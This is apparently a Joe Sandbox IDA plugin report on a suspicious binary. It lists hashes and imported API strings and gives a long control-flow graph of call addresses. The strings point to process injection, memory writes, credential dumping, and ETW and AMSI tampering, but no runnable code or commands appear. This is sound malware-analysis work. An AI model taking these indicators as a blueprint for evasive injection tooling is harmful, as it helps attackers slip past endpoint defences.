                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFile$CreateHandleLibraryProcess$AddressAttributesCacheExitFlushFreeInstructionLoadProcResumeThreadUserWrite
                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                  • API String ID: 304482832-3738268246
                                                                  • Opcode ID: 8dd5cde29277971bf0b3deadc2600222c4699b0d42c8c7aa02fe79afee42f2b7
                                                                  • Instruction ID: e9228d0790d3a5d9fec8526887c119f5595ecb0ee7afe9c76cfff33fea283f2a
                                                                  • Opcode Fuzzy Hash: 8dd5cde29277971bf0b3deadc2600222c4699b0d42c8c7aa02fe79afee42f2b7
                                                                  • Instruction Fuzzy Hash: E243ED35A8012D8BDB12EB64DD919CE73BAFF84344F10E1A9F409AB255DB30AE52CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6965 2ed3e16-2ed5529 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecf098 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ece35c call 2eb4de0 call 2eb4764 call 2eb4de0 call 2ecdc90 Sleep call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec88c8 call 2eb49a0 call 2eb3244 call 2ece67c call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 Sleep call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec7c20 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec7c20 call 2ec895c call 2ec88c8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ece35c call 2eb4de0 call 2eb4764 call 2eb4de0 call 2ecdc90 call 2ec88c8 call 2ecf098 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec88c8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec88c8 call 2ece35c call 2eb4de0 call 2eb4764 call 2eb4de0 call 2ecdc90 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec88c8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 Sleep call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb49a0 call 2eb4d74 call 2ecdc08 call 2eb49a0 call 2eb4d74 call 2ecdc08 call 2eb49a0 call 2eb4d74 call 2ecdc08 call 2eb49a0 call 2eb4d74 call 2ecdc08 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4d74 call 2ecdc08 call 2eb4d74 call 2ecdc08 call 2eb4d74 7650 2ed5534-2ed5b06 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ece39c call 2eb4530 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb7adc call 2ecf170 call 2eb4530 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecf098 call 2ecf10c call 2eb4530 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6965->7650 7651 2ed552f call 2ecdc08 6965->7651 7821 2ed5b0b-2ed5d86 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 7650->7821 7651->7650 7894 2ed756c-2ed77e7 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 7821->7894 7895 2ed5d8c-2ed5dd1 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb7e6c 7821->7895 8040 2ed77ed-2ed797f call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb47ec call 2eb49a0 7894->8040 8041 2ed831c-2ed851b call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 7894->8041 7895->7894 7913 2ed5dd7-2ed64df call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 7895->7913 8561 2ed64e4-2ed64e5 call 2ec85cc 7913->8561 8178 2ed7984-2ed7985 call 2ec85cc 8040->8178 8217 2ed93a5-2ed9528 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 8041->8217 8218 2ed8521-2ed86f4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb47ec call 2eb49a0 call 2eb4d74 call 2eb4df0 CreateProcessAsUserW 8041->8218 8184 2ed798a-2ed79f5 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 8178->8184 8221 2ed79fa-2ed7a01 call 2ec89e0 8184->8221 8400 2ed952e-2ed953d call 2eb48ec 8217->8400 8401 2ed9cf9-2ed9e8f call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 8217->8401 8430 2ed86f6-2ed876d call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 8218->8430 8431 2ed8772-2ed887d call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 8218->8431 8229 2ed7a06-2ed7b10 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb49a0 call 2eb46d4 8221->8229 8357 2ed7b15-2ed7b20 call 2ecadfc 8229->8357 8365 2ed7b25-2ed7b90 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 8357->8365 8417 2ed7b95-2ed7b9c call 2ec89e0 8365->8417 8400->8401 8412 2ed9543-2ed9816 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecf098 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb7e6c 8400->8412 8645 2ed9e94-2ed9e9b call 2ec89e0 8401->8645 8833 2ed981c-2ed9aee call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ece35c call 2eb4530 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4de0 * 2 call 2eb4764 call 2ecdc90 8412->8833 8834 2ed9af3-2ed9cf4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb49f8 call 2ec8d74 8412->8834 8427 2ed7ba1-2ed7e3f call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb36d0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 8417->8427 8809 2ed7e46-2ed80f7 call 2ec5afc call 2eb4bcc call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb49f8 call 2ec7e60 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 8427->8809 8810 2ed7e41-2ed7e44 8427->8810 8430->8431 8588 2ed887f-2ed8882 8431->8588 8589 2ed8884-2ed8ba4 call 2eb49f8 call 2ecde54 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecd168 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 8431->8589 8573 2ed64ea-2ed6555 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 8561->8573 8636 2ed655a-2ed6561 call 2ec89e0 8573->8636 8588->8589 9124 2ed8bbd-2ed92c4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 ResumeThread call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 CloseHandle call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec8090 call 2ec895c * 6 CloseHandle 8589->9124 9125 2ed8ba6-2ed8bb8 call 2ec8740 8589->9125 8642 2ed6566-2ed66e9 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 8636->8642 8879 2ed694d-2ed69b8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 8642->8879 8880 2ed66ef-2ed693c call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb4d74 call 2eb4de0 call 2eb4764 8642->8880 8652 2ed9ea0-2eda0cf call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 8645->8652 9021 2eda0d4-2eda0db call 2ec89e0 8652->9021 9349 2ed80fc-2ed8108 call 2ecb11c 8809->9349 8810->8809 8833->8834 8834->8401 8963 2ed69bd-2ed69c4 call 2ec89e0 8879->8963 9329 2ed6941-2ed6948 call 2ecdc90 8880->9329 8977 2ed69c9-2ed7044 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb36d0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb2f08 call 2eb79a0 call 2eb47ec call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb2f08 call 2eb79a0 call 2eb47ec call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 8963->8977 9739 2ed7049-2ed7056 call 2ec4de4 8977->9739 9036 2eda0e0-2eda102 call 2eb46d4 * 2 9021->9036 9065 2eda107-2eda10e call 2ec89e0 9036->9065 9079 2eda113-2eda168 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 9065->9079 9150 2eda16d-2eda174 call 2ec89e0 9079->9150 9811 2ed92c9-2ed93a0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 9124->9811 9125->9124 9165 2eda179-2eda46d call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 9150->9165 9526 2eda472-2eda479 call 2ec89e0 9165->9526 9329->8879 9356 2ed810d-2ed8124 call 2eb3700 9349->9356 9532 2eda47e-2eda4a0 call 2eb46d4 * 2 9526->9532 9543 2eda4a5-2eda4ac call 2ec89e0 9532->9543 9549 2eda4b1-2eda4d3 call 2eb46d4 * 2 9543->9549 9561 2eda4d8-2eda4df call 2ec89e0 9549->9561 9567 2eda4e4-2eda506 call 2eb46d4 * 2 9561->9567 9580 2eda50b-2eda512 call 2ec89e0 9567->9580 9587 2eda517-2eda9b1 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec 